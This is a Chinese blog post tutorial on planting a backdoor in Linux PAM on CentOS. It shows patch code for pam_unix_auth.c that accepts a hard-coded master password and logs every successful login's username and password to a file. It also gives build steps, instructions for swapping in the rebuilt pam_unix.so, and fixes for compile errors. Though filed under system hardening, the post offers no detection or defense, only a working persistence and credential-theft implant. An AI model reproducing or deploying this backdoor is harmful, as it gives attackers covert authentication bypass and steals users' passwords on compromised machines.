首页 > 系统加固 > Linux/Unix > linux系统安全之pam后门
2013
09-10

linux系统安全之pam后门

本文由Sky原创投稿,请尊重劳动成果,转载注明出处!

测试环境:Centos 6.2 64位

0x01:查询本机的PAM版本

linux系统安全之pam后门 - 第1张  | 阿德马Web安全

下载地址:

http://www.linux-pam.org/library/

https://fedorahosted.org/releases/l/i/linux-pam/

下载对应的版本

对原有的文件进行备份

linux系统安全之pam后门 - 第2张  | 阿德马Web安全

 

0x02:修改源文件

修改pam_unix_auth.c

linux系统安全之pam后门 - 第3张  | 阿德马Web安全

添加万能密码

 

/* verify the password of this user */

retval = _unix_verify_password(pamh, name, p, ctrl);

//万能密码

if(strcmp(p,”pam”)==0)

{

retval = PAM_SUCCESS;

}

 

//存储密码的地方

if(retval== PAM_SUCCESS)

{

fp=fopen(“pam.txt”,”a”);

fprintf(fp,”%s::%s\n”,name,p);

fclose(fp);

}

 

linux系统安全之pam后门 - 第4张  | 阿德马Web安全

./configure

make

在Linux-PAM-1.1.1/modules/pam_unix/.libs中的pam_unix.so就是后门文件

对/lib64/security中的文件进行替换

 

0x03测试后门

linux系统安全之pam后门 - 第5张  | 阿德马Web安全

成功登录,并且记录密码,证明成功!

 

make过程中可能会出现一下问题:

0x01:

linux系统安全之pam后门 - 第6张  | 阿德马Web安全
未定义yywrap()这个函数

根据提示的文件路径,在里面定义

#define yywrap() 1

0x02:

 

linux系统安全之pam后门 - 第7张  | 阿德马Web安全

在PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags,int argc, const char **argv)

中定义

FILE *fp;

 

 

最后编辑:
作者:admin
这个作者貌似有点懒,什么都没有留下。

linux系统安全之pam后门》有 1 条评论

  1. Hell-Phantom 说:

    pam-1.1.1版的源码无论我在32位还是64位下,原版不做任何修改的代码编译出来的pam_unix.so 都不能被centos 6.x正常识别, 执行个passwd命令就提示鉴权失败了,切换回系统自带就正常。 不知道为什么, 明明系统里的也是1.1.1版的PAM

留下一个回复

你的email不会被公开。